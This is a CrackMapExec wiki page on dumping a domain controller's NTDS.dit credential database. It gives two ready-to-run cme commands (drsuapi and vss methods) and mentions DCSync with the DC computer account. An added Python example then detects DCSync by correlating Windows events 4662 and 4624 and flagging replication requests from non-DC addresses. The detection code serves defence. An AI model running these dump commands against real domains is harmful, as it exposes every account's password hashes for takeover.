CrackMapExec ~ CME WIKI
Public Release - v5.2.2
@byt3bl33d3r
@mpgn_x64
Dump NTDS.dit
Dump the NTDS.dit from the target DC using methods from secretsdump.py.
Requires Domain Admin or Local Admin privileges on the target Domain Controller.
2 methods are available:
(default) drsuapi - Uses the drsuapi RPC interface to create a handle, trigger replication, and, combined with additional drsuapi calls, convert the resultant linked-lists into a readable format
vss - Uses the Volume Shadow copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
You can also DCSync with the computer account of the DC.
Remember to play this music every time you get DA
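For the drsuapi method and the DC computer account note above, here is a detection-side example added to this page (it is not part of the CME wiki or the CME code base). It correlates Security event 4662 replication access with the 4624 logon behind it and alerts on the source address rather than the account name. It assumes Directory Service Access auditing is producing 4662 on the DCs; `DC_IPS`, the helper names and all sample events are constructed.

```python
# Added example (not from the CME wiki): correlate 4662 replication access with
# the 4624 logon that produced it. All event records below are constructed.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
DC_IPS = {"192.168.1.100", "192.168.1.101"}  # assumed inventory of real DC addresses

def find_dcsync(events, dc_ips=DC_IPS):
    """Return one alert per (account, source) that replicated from a non-DC address."""
    # Logon ID -> source address, taken from 4624 logon events.
    logon_src = {e["TargetLogonId"]: e["IpAddress"]
                 for e in events if e["EventID"] == 4624}
    alerts, seen = [], set()
    for e in events:
        if e["EventID"] != 4662:
            continue
        props = e.get("Properties", "").lower()
        if not any(guid in props for guid in REPL_GUIDS):
            continue
        src = logon_src.get(e["SubjectLogonId"])  # None if the logon was not captured
        key = (e["SubjectUserName"], src)
        # Decide on the source address, not the account name: a DC machine
        # account used from a workstation looks legitimate by name alone.
        if src in dc_ips or key in seen:
            continue
        seen.add(key)
        alerts.append({"account": key[0], "source": src})
    return alerts

def ev4624(user, logon_id, ip):
    return {"EventID": 4624, "TargetUserName": user, "TargetLogonId": logon_id, "IpAddress": ip}

def ev4662(user, logon_id, guid):
    return {"EventID": 4662, "SubjectUserName": user, "SubjectLogonId": logon_id,
            "Properties": "%%7688 {" + guid + "}"}

GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
SAMPLE_EVENTS = [  # constructed, reduced to the fields used above
    ev4624("DC02$", "0x3e1a10", "192.168.1.101"),     # normal DC-to-DC replication
    ev4662("DC02$", "0x3e1a10", GET_CHANGES_ALL),
    ev4624("UserNAme", "0x5b7c22", "192.168.1.50"),   # admin user from a workstation
    ev4662("UserNAme", "0x5b7c22", GET_CHANGES_ALL),
    ev4662("UserNAme", "0x5b7c22", GET_CHANGES_ALL.upper()),  # repeat, upper-case GUID
    ev4624("DC01$", "0x6f0d31", "192.168.1.50"),      # DC machine account, non-DC source
    ev4662("DC01$", "0x6f0d31", GET_CHANGES_ALL),
    ev4662("svc-sync", "0x700001", "bf967aba-0de6-11d0-a285-00aa003049e2"),  # unrelated GUID
]
```

A replication event whose logon cannot be found is reported with a source of `None` instead of being dropped, so gaps in 4624 collection surface as alerts to review.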
Last modified
5mo ago